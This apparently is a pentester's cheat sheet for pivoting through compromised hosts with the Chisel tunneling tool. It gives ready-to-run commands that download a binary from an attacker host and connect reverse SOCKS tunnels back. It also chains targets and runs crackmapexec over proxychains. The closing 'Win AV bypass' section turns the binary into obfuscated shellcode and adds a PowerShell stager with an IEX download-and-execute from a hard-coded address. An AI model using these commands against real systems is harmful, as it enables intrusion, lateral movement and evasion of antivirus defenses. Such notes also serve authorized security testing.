###### Chisel ###### | https://github.com/jpillora/chisel | https://github.com/jpillora/chisel/releases/latest *************** Chisel Instance *************** | I use only one instance to manage multiple proxy endpoints. | (replace bla:bla with other random creds if you want to) .. code-block:: bash docker run --name chisel --rm -d -p0.0.0.0:443:80 jpillora/chisel server --socks5 --reverse -v --auth bla:bla --port 80 docker inspect --format '{{ .NetworkSettings.IPAddress }}' chisel # Get container ip, probably 172.17.0.2 docker logs chisel -f # Stream logs | **************** Target as Socks5 **************** | Upload chisel on target, and link it to chisel server. | Don't forget to set credentials if you replaced them in the first place. | POWERSHELL .. code-block:: powershell (New-Object System.Net.WebClient).DownloadFile("http://ATTACKER/chisel.exe", "$env:TEMP\chisel.exe") Start-Process -NoNewWindow -FilePath "$env:TEMP\chisel.exe" -ArgumentList "client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks" | CMD ALTERNATIVE .. code-block:: batch START "" "/users/user/chisel.exe" client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks # If you need to kill all chisel processes ... # taskkill /F /IM chisel.exe | | Linux .. code-block:: bash wget http://ATTACKER/chisel -O /tmp/chisel;chmod 755 /tmp/chisel /tmp/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks & | Great, our chisel container now listen on port 5000 as socks5 ! | Here is an example about how to use it with proxychains .. code-block:: bash echo -e '[ProxyList]\nsocks5 172.17.0.2 5000'>/tmp/TARGET1 proxychains -q -f /tmp/TARGET1 crackmapexec smb TARGET_NETWORK | ****************** Target as Listener ****************** | You want the target to listen on a port and forward the traffic back to you ? | Let's say you want to chain multiple chisel | TARGET2 => TARGET1:7777 => ATTACKER:443 | BASH .. code-block:: bash # Target1 chisel client -v --auth bla:bla ATTACKER:443 TARGET1IP:7777:ATTACKER:443 & # Target2 (socks5) chisel client -v --auth bla:bla TARGET1IP:7777 R:0.0.0.0:6000:socks & # Attacker echo -e '[ProxyList]\nsocks5 172.17.0.2 6000'>/tmp/TARGET2 proxychains -q -f /tmp/TARGET2 crackmapexec smb TARGET2_NETWORK | ************* Win AV bypass ************* | (You need the loadsc script https://offensive.run/winecosystem/lpe/README.html#av-bypass) .. code-block:: bash LHOST="192.168.45.216" LPORT=443 PARAMS="client -v --auth bla:bla $LHOST:$LPORT R:0.0.0.0:5000:socks" INPUT_FILE='/var/www/html/chisel.exe' SHELLCODE_OUTPUT_FILE='/tmp/chiselsc' ENCODED_PAYLOAD_FILE='/var/www/html/chiselsc' python3 -c "import donut; donut.create(thread=0,compress=2,bypass=1,exit_opt=3,arch=2,file='$INPUT_FILE',output='$SHELLCODE_OUTPUT_FILE',params=bytes.fromhex('$( echo -en "$PARAMS" | xxd -plain | tr -d '\n' )').decode('utf-8'))" cat "$SHELLCODE_OUTPUT_FILE" | xxd -plain | tr -d '\n' | rev | gzip | sudo tee "$ENCODED_PAYLOAD_FILE" >/dev/null cat <<'EOF'|sudo tee /var/www/html/startchisel $loadsc="$web/loadsc"; $sc="$web/chiselsc"; $python="$web/python.zip"; $dir="$env:TEMP"; $Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")}; $arguments = @("-c","""import urllib.request as r;exec(bytes.fromhex(r.urlopen('$loadsc').read()[::-1].decode('utf-8')));load('$sc')""") Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments EOF | | Then call chisel .. code-block:: bash $web="http://192.168.45.216";IEX(New-Object Net.WebClient).downloadString("$web/startchisel")